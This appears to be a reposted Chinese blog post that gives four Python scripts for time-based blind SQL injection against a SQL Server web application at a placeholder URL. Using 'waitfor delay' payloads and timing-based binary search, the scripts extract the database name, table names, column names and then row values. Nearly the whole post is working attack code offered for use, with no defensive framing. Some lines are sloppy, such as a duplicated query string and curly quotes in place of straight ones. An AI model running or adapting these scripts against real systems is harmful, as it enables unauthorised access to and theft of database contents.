大家好,我是考100分的小小码 ,祝大家学习进步,加薪顺利呀。今天说一说SQL server 时间盲注脚本,希望您对编程的造诣更进一步.
![SQL server 时间盲注脚本[数据库教程]](https://www.yht7.com/upload/image/images/imgsql/8.jpg "SQL server 时间盲注脚本插图")
![SQL server 时间盲注脚本[数据库教程]](https://daima100.com/wp-content/themes/justnews/themer/assets/images/lazy.png "SQL server 时间盲注脚本插图1")
一、爆破当前数据库名
#coding:utf-8
import requests
import time
import string
import sys
headers = {"user-agent":"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)"}
#chars = ‘0123456789.@_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz‘
databases = []
length = []
for l in range(1,50):
lengthUrl = "http://www.xxxx.com/id.aspx?classify=1‘;if(len((select db_name())))>{0} waitfor delay ‘0:0:1‘ -- "
lengthUrlFormat = lengthUrl.format(l)
start_time0 = time.time()
rsp0 = requests.get(lengthUrlFormat,headers=headers)
if time.time() - start_time0 < 2:
length.append(l)
print(‘ length is ‘ + str(l))
break
else:
pass
print(length)
databasename = ‘‘
for i in range(1,length[0]+1):
min_value = 48
max_value = 122
mid = (min_value + max_value) // 2
while(min_value < max_value):
url = "http://www.xxxx.com/id.aspx?classify=1.aspx?classify=1‘;if(ascii(substring((select db_name()),{0},1)))>{1} waitfor delay ‘0:0:1‘ --"
urlformat = url.format(i,mid)
start_time = time.time()
rsp = requests.get(urlformat,headers=headers)
if time.time() - start_time > 2:
min_value = mid + 1
else:
max_value = mid
pass
mid = (min_value+max_value)//2
databasename+=chr(mid)
print(databasename)
databases.append(databasename)
print(databases)
二、爆破表名
#coding:utf-8
import requests
import time
import string
import sys
headers = {"user-agent":"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)"}
#chars = ‘0123456789.@_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz‘
tables = []
length = []
num = []
num2 = []
for i in range(0,1000):
tablenum = "http://www.xxxx.com/id.aspx?classify=1‘;if(ascii(substring((select top 1 name from DB..sysobjects where xtype=‘U‘ and name not in (select top {0} name from sys.tables)),1,1)))>0 waitfor delay ‘0:0:1‘ -- "
tablenumFormat = tablenum.format(i)
start_time0 = time.time()
rsp1 = requests.get(tablenumFormat,headers=headers)
num.append(i)
num2.append(i)
if time.time() - start_time0 < 2:
break
else:
pass
#print(num)
num.pop()
for n in num:
for l in range(1,50):
lengthUrl = "http://www.xxxx.com/id.aspx?classify=1‘;if(len((select top 1 name from DB..sysobjects where xtype=‘U‘ and name not in (select top {0} name from sys.tables))))>{1} waitfor delay ‘0:0:1‘ -- "
lengthUrlFormat = lengthUrl.format(n,l)
start_time0 = time.time()
rsp0 = requests.get(lengthUrlFormat,headers=headers)
if time.time() - start_time0 < 2:
length.append(l)
#print(‘ length is ‘ + str(l))
break
else:
pass
#print(length)
for n in num:
tablename = ‘‘
le = num.index(n)
for i in range(1,length[le]+1):
min_value = 48
max_value = 122
mid = (min_value + max_value) // 2
while(min_value < max_value):
url = "http://www.xxxx.com/id.aspx?classify=1‘;if(ascii(substring((select top 1 name from DB..sysobjects where xtype=‘U‘ and name not in (select top {0} name from sys.tables)),{1},1)))>{2} waitfor delay ‘0:0:1‘ --"
urlformat = url.format(n,i,mid)
start_time = time.time()
rsp = requests.get(urlformat,headers=headers)
if time.time() - start_time > 2:
min_value = mid + 1
else:
max_value = mid
pass
mid = (min_value+max_value)//2
tablename+=chr(mid)
#print(tablename)
tables.append(tablename)
for j in range(0,len(num)):
print("第%d表名:%s"%(num[j],tables[j]))
三、爆破字段名
#coding:utf-8
import requests
import time
import string
import sys
headers = {"user-agent":"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)"}
#chars = ‘0123456789.@_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz‘
tables = []
length = []
num = []
num2 = []
for i in range(0,1000):
tablenum = "http://www.xxxx.com/id.aspx?classify=1‘;if(ascii(substring((select top 1 name from DB..syscolumns Where id=Object_Id(‘表名‘) and name not in (select top {0} name from DB..syscolumns Where id=Object_Id(‘表名‘))),1,1)))>0 waitfor delay ‘0:0:1‘ -- "
tablenumFormat = tablenum.format(i)
start_time0 = time.time()
rsp1 = requests.get(tablenumFormat,headers=headers)
num.append(i)
num2.append(i)
if time.time() - start_time0 < 2:
break
else:
pass
print(num)
num.pop()
for n in num:
for l in range(1,50):
lengthUrl = "http://www.xxxx.com/id.aspx?classify=1‘;if(len((select top 1 name from DB..syscolumns Where id=Object_Id(‘表名‘) and name not in (select top {0} name from DB..syscolumns Where id=Object_Id(‘表名‘)))))>{1} waitfor delay ‘0:0:1‘ -- "
lengthUrlFormat = lengthUrl.format(n,l)
start_time0 = time.time()
rsp0 = requests.get(lengthUrlFormat,headers=headers)
if time.time() - start_time0 < 2:
length.append(l)
print(‘ length is ‘ + str(l))
break
else:
pass
print(length)
for n in num:
tablename = ‘‘
le = num.index(n)
for i in range(1,length[le]+1):
min_value = 48
max_value = 122
mid = (min_value + max_value) // 2
while(min_value < max_value):
url = "http://www.xxxx.com/id.aspx?classify=1‘;if(ascii(substring((select top 1 name from DB..syscolumns Where id=Object_Id(‘表名‘) and name not in (select top {0} name from DB..syscolumns Where id=Object_Id(‘表名‘))),{1},1)))>{2} waitfor delay ‘0:0:1‘ -- "
urlformat = url.format(n,i,mid)
start_time = time.time()
rsp = requests.get(urlformat,headers=headers)
if time.time() - start_time > 2:
min_value = mid + 1
else:
max_value = mid
pass
mid = (min_value+max_value)//2
tablename+=chr(mid)
print(tablename)
tables.append(tablename)
for j in range(0,len(num)):
print("第%d列名:%s"%(num[j],tables[j]))
四、爆破字段值
#coding:utf-8
import requests
import time
import string
import sys
headers = {"user-agent":"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)"}
#chars = ‘0123456789.@_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz‘
tables = []
length = []
num = []
num2 = []
for i in range(0,1000):
tablenum = "http://www.xxxx.com/id.aspx?classify=1‘;if(ascii(substring((select top 1 字段名 from DB..表名 where Account not in (select top {0} 字段名 from DB..表名)),1,1)))>0 waitfor delay ‘0:0:1‘ -- "
tablenumFormat = tablenum.format(i)
start_time0 = time.time()
rsp1 = requests.get(tablenumFormat,headers=headers)
num.append(i)
num2.append(i)
if time.time() - start_time0 < 2:
break
else:
pass
print(num)
num.pop()
for n in num:
for l in range(1,20):
lengthUrl = "http://www.xxxx.com/id.aspx?classify=1‘;if(len((select top 1 字段名 from DB..表名 where Account not in (select top {0} 字段名 from DB..表名))))>{1} waitfor delay ‘0:0:1‘ -- "
lengthUrlFormat = lengthUrl.format(n,l)
start_time0 = time.time()
rsp0 = requests.get(lengthUrlFormat,headers=headers)
if time.time() - start_time0 < 2:
length.append(l)
print(‘ length is ‘ + str(l))
break
else:
pass
print(length)
for n in num:
tablename = ‘‘
le = num.index(n)
for i in range(1,length[le]+1):
min_value = 48
max_value = 122
mid = (min_value + max_value) // 2
while(min_value < max_value):
url = "http://www.xxxx.com/id.aspx?classify=1‘;if(ascii(substring((select top 1 字段名 from DB..表名 Where Account not in (select top {0} 字段名 from DB..表名)),{1},1)))>{2} waitfor delay ‘0:0:1‘ -- "
urlformat = url.format(n,i,mid)
start_time = time.time()
rsp = requests.get(urlformat,headers=headers)
if time.time() - start_time > 2:
min_value = mid + 1
else:
max_value = mid
pass
mid = (min_value+max_value)//2
tablename+=chr(mid)
print(tablename)
tables.append(tablename)
for j in range(0,len(num)):
print("第%d值:%s"%(num[j],tables[j]))
SQL server 时间盲注脚本
原文:https://www.cnblogs.com/sakura521/p/14988486.html
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
转载请注明出处: https://daima100.com/6044.html
